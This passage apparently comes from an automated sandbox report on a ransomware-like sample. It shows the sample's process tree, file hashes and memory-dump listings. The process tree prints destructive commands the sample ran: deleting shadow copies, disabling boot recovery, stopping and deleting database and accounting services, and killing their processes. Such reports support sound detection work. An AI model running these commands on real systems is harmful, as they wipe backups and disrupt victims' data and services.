C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISADMIN4⤵
-
C:\Windows\SysWOW64\net.exenet stop firebirdguardiandefaultinstance3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop firebirdguardiandefaultinstance4⤵
-
C:\Windows\SysWOW64\net.exenet stop ibmiasrw3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ibmiasrw4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMonitorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop QBPOSDBServiceV12
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop QBPOSDBServiceV12
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop IISADMIN
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop IISADMIN
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop "Simply Accounting Database Connection Manager"
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop QuickBooksDB1
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop QuickBooksDB1
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop QuickBooksDB2
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop QuickBooksDB2
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop QuickBooksDB3
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop QuickBooksDB3
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop QuickBooksDB4
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop QuickBooksDB4
- C:\Windows\SysWOW64\net.exe (level 3)
  net stop QuickBooksDB5
- C:\Windows\SysWOW64\net1.exe (level 4)
  C:\Windows\system32\net1 stop QuickBooksDB5
- C:\Windows\SysWOW64\taskkill.exe (level 3)
  taskkill -f -im UniFi.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe (level 2)
  C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification
- C:\Windows\system32\vssadmin.exe (level 3)
  "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
  - Interacts with shadow copies
- C:\Windows\SysWOW64\cmd.exe (level 3)
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
- C:\Windows\SysWOW64\cmd.exe (level 3)
  "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
- C:\Windows\SysWOW64\cmd.exe (level 3)
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
- C:\Windows\system32\vssvc.exe (level 1)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\Ksifbwxmmfbgnkill$-arab.bat
  Filesize: 53KB
  MD5: b57545cb36ef6a19fdde4b2208ebb225
  SHA1: 1d319740835ff12562e04cc74545a047bba63031
  SHA256: 445d709ea4ae38706a0cc47ffc6c100fb9a354ff1ac718d0c23415524bdfc895
  SHA512: 3618bb17282d8d82ff280590563eebd5c0b181d24156f6a69cba53d17a1bae0d9287c9f191efbe6c3d4223bcb47348c74177000aa0844263ed176df56e1f0856
- memory/108-84-0x0000000000000000-mapping.dmp
- memory/296-137-0x0000000000000000-mapping.dmp
- memory/296-113-0x0000000000000000-mapping.dmp
- memory/320-58-0x000000006F2F0000-0x000000006F89B000-memory.dmp (Filesize: 5.7MB)
- memory/320-59-0x000000006F2F0000-0x000000006F89B000-memory.dmp (Filesize: 5.7MB)
- memory/320-60-0x000000006F2F0000-0x000000006F89B000-memory.dmp (Filesize: 5.7MB)
- memory/320-121-0x0000000000000000-mapping.dmp
- memory/320-56-0x0000000075F21000-0x0000000075F23000-memory.dmp (Filesize: 8KB)
- memory/320-55-0x0000000000000000-mapping.dmp
- memory/480-81-0x0000000000000000-mapping.dmp
- memory/480-138-0x0000000000000000-mapping.dmp
- memory/576-125-0x0000000000000000-mapping.dmp
- memory/576-61-0x0000000005EF0000-0x0000000006114000-memory.dmp (Filesize: 2.1MB)
- memory/576-54-0x0000000000A60000-0x0000000000A68000-memory.dmp (Filesize: 32KB)
- memory/580-104-0x0000000000000000-mapping.dmp
- memory/640-119-0x0000000000000000-mapping.dmp
- memory/692-120-0x0000000000000000-mapping.dmp
- memory/692-94-0x0000000000000000-mapping.dmp
- memory/700-136-0x0000000000000000-mapping.dmp
- memory/700-114-0x0000000000000000-mapping.dmp
- memory/772-118-0x0000000000000000-mapping.dmp
- memory/828-126-0x0000000000000000-mapping.dmp
- memory/836-108-0x0000000000000000-mapping.dmp
- memory/844-67-0x0000000000000000-mapping.dmp
- memory/852-70-0x0000000000000000-mapping.dmp
- memory/872-107-0x0000000000000000-mapping.dmp
- memory/872-128-0x0000000000000000-mapping.dmp
- memory/892-87-0x0000000000000000-mapping.dmp
- memory/932-72-0x0000000000000000-mapping.dmp
- memory/1004-80-0x0000000000000000-mapping.dmp
- memory/1016-74-0x0000000000000000-mapping.dmp
- memory/1016-133-0x0000000000000000-mapping.dmp
- memory/1080-62-0x0000000000000000-mapping.dmp
- memory/1124-68-0x0000000000000000-mapping.dmp
- memory/1128-124-0x0000000000000000-mapping.dmp
- memory/1132-78-0x0000000000000000-mapping.dmp
- memory/1164-66-0x0000000000000000-mapping.dmp
- memory/1200-109-0x0000000000000000-mapping.dmp
- memory/1204-139-0x0000000000000000-mapping.dmp
- memory/1304-82-0x0000000000000000-mapping.dmp
- memory/1404-117-0x0000000000000000-mapping.dmp
- memory/1476-123-0x0000000000000000-mapping.dmp
- memory/1508-131-0x0000000000000000-mapping.dmp
- memory/1508-112-0x0000000000000000-mapping.dmp
- memory/1540-79-0x0000000000000000-mapping.dmp
- memory/1568-64-0x0000000000000000-mapping.dmp
- memory/1572-103-0x0000000000000000-mapping.dmp
- memory/1612-88-0x0000000000000000-mapping.dmp
- memory/1616-73-0x0000000000000000-mapping.dmp
- memory/1632-76-0x0000000000000000-mapping.dmp
- memory/1632-115-0x0000000000000000-mapping.dmp
- memory/1636-77-0x0000000000000000-mapping.dmp
- memory/1684-134-0x0000000000000000-mapping.dmp
- memory/1684-111-0x0000000000000000-mapping.dmp
- memory/1700-129-0x0000000000000000-mapping.dmp
- memory/1768-98-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-101-0x0000000000408F1E-mapping.dmp
- memory/1768-140-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-100-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-96-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-95-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-122-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-92-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-90-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-89-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1768-106-0x0000000000400000-0x000000000042A000-memory.dmp (Filesize: 168KB)
- memory/1780-83-0x0000000000000000-mapping.dmp
- memory/1800-85-0x0000000000000000-mapping.dmp
- memory/1808-97-0x0000000000000000-mapping.dmp
- memory/1812-86-0x0000000000000000-mapping.dmp
- memory/1836-116-0x0000000000000000-mapping.dmp
- memory/1920-135-0x0000000000000000-mapping.dmp
- memory/1924-110-0x0000000000000000-mapping.dmp
- memory/1924-69-0x0000000000000000-mapping.dmp
- memory/1952-130-0x0000000000000000-mapping.dmp
- memory/1980-75-0x0000000000000000-mapping.dmp
- memory/1992-65-0x0000000000000000-mapping.dmp
- memory/2012-71-0x0000000000000000-mapping.dmp
- memory/2024-127-0x0000000000000000-mapping.dmp
- memory/2032-132-0x0000000000000000-mapping.dmp